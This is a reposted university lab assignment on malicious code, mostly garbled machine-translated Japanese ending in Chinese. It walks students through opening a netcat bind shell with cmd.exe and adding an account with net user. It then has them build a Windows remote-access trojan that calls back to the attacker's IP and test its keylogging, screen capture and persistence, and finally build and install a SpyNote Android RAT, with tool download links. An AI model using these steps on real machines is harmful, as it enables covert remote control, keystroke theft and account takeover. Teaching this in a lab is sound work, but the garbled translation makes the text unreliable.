実験4 - 悪意のあるコード技術

学校数201 721 430 024

 

中国人民公安大学

中国人 公安大学

 

ネットワーク戦テクノロジー

実験報告

 

実験4

悪意のあるコード技術

 

 

 

学生の名前

王Runtian 

 2017

地区チーム

 実験クラス

インストラクター

 あなたの意見

 

 

情報とネットワークセキュリティ技術専門学校

201 6 インディアン11 7 Riを

 

マスター実験タスク

2016—2017 学年 第  学期

まず、実験の目的

1。トロイの木馬のための練習では、その読者が理解していることや、操作のトロイの木馬普及とメカニズムを習得し、手動で把握し、削除トロイの木馬スキルを、トロイの木馬防衛関連の知識を学び、トロイの木馬に対するセキュリティの意識を高めるために、トロイの木馬、トロイの木馬のチェックを削除します。

 

2。理解し、一般的なネットワーク攻撃ツール、トロイの木馬の基本的な機能に精通しています。

3。カリキュラムの知識と実践的なアプリケーションの統合の目的。

第二に、実験的な要件

1。慎重に各実験の内容を読んで、私たちは、タイトルをキャプチャするために明確なスクリーンショットと注釈のスクリーンショットと説明する必要があります。

2。ドキュメントの要件明確な構造、グラフィック表現、正確なラベリング仕様。推論は、客観的合理的かつ論理的でした。

3。ソフトウェアツールは、その上NC、MSFとご利用いただけます。

4。実験後、電子文書を保持します。

、実験手順

1。レディ

事前に実験の準備は、実験の内容や時間の実験内容準備が先の要件に従って、ソフトウェアツールに精通しているとの良好な実験と準備ができて、実験前実験、テスト要件とテスト内容の目的についてもっと学ぶべきです。

2。実験環境

(ソフトウェアのさまざまなツールを含む)実験に使用したハードウェアおよびソフトウェア環境を説明します。

Office2003などブートとは、ソフトウェアまたは2007、ブラウザ、暗号化および復号化ソフトウェアを起動します。

3。実験

1)システムを起動し、起動ツール環境を。

ソフトウェアツールを使用した実験内容の2)を実現。

4。実験報告

試験報告書フォーマットの標準要件に従ってラボレポートを書きます。書式テンプレート埋め込み試験報告書に従って作成された文書は、記述されたフォーマットの規定に従って書かれた文書は、フォームは、グラフィックス、テーブルイラストを持っていると言わなければなりません。

NC制御コンピュータを使用してタスク

   

 サーベルのネットワークとのnetcatは、彼のソフトウェアは、今だけ十KBのサイズが、機能はありません削減に圧縮されているので、小さなリーンと強力な機能は、それが小さく、リーンにすると述べました。

   

実験手順は、互いの完成を持つ2人の学生が必要です。

   

ステップ1:

   

   マシン(学生A)被害者は、
次のコマンドを入力します。
  nc.exe -l -p -e cmd.exeのポートはリスニングモードに入ります

   


ステップ2:
  攻撃者のマシン(学生B)。
次のコマンドを入力します。
  NC //ポートIP接続victim_IPを、その後、シェルを取得します。(スクリーンショットは必須)

 

 

   

   

ステップ3:

   

    シェルでは、ネットユーザーのユーザー名とパスワード/アドオンを使用して、ユーザーを追加し、被害者のマシンを確認するために、net userコマンドを使用します。(スクリーンショットは必須)

 

   

   

 あなたは、何かをするためのコマンドラインを続行することができます。

   

タスク2つのトロイの木馬は、コンピュータの使用を制御します

ツール:

https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg

   

実験手順は、2人の学生が必要です。

   

ステップ1:

   

    攻撃者のマシン。(学生A)は
2つのトロイの木馬機能に似V2014.exeプログラムまたはスターRATを、開きます。

   

   


ステップ2:
  ポップ・コンフィギュレーション・サーバに「生成されたサービス」のメニューバーをクリックして、に設定バックにもIPアドレス(攻撃者IP)とポート番号、およびトロイの木馬サーバーを生成する「生成」ボタンをクリックしてください。

 

   

   

   

ステップ3:

   

被害者のマシンへの結果のトロイの木馬の実行コピーし、ダブルクリックで実行します。 

 

ステップ4:

   

トロイの木馬制御端末の場合には行、および機能テストと各ショットを参照。 

 

  1. ドキュメント管理、ファイルをコピーしよう

  2. 屏幕控制,尝试获取桌面

  3. 键盘记录,尝试获取对方击键记录

  4. 会话管理,重启对方机器,查看是否能自启动上线

 

会话管理,卸载对方的木马。

 

任务三 Android远控实践  所有过程截图写博客

 相关工具下载:

spynote及环境工具:

https://pan.baidu.com/s/1Olo9znpzADXMYDfi_rnjOg

android模拟器:

https://www.yeshen.com/

http://mumu.163.com/

   

实验步骤:

一、攻击者打开spynote软件,该软件需要先安装.netframework4.0和jdk环境。

   

 

   

   

二、配置并打开监听端口

   

    点击Listen Port,在弹出的对话框中输入端口号,并点击Add按钮,最后点击OK,成功监听本地端口。【本过程选用3210端口,实验过程大家可以自己选择端口】

   

 

   

   

三、配置并生成木马

   

(1)点击Build Client按钮,弹出对话框

   

 

   

   

(2)配置回连IP和端口,IP地址填写运行spynote的机器IP,端口填写监听的端口号,本次填写3210端口。

   

 

   

   

    (3)配置相关属性信息。

   

 

   

   

    (4)最后点击Build按钮,在选择框中选择和spynote同处在一个文件夹中Patch-release.apk。

   

 

   

   

    (5)完成后,自动打开APK生成所在的文件夹。

   

   

 

   

四、将木马安装在Android模拟其中。

   

 

 

   

   

五、在Spynote中控制手机

   

可以在spynote中看到有一台机器上线,并可以查看其基本信息。

 

   

 

   

   

在该机器中右键,可以看到可以对该机器进行控制的功能,从中选择4个以上的项目进行实验。

  

おすすめ

転載: www.cnblogs.com/p201721430024/p/12010172.html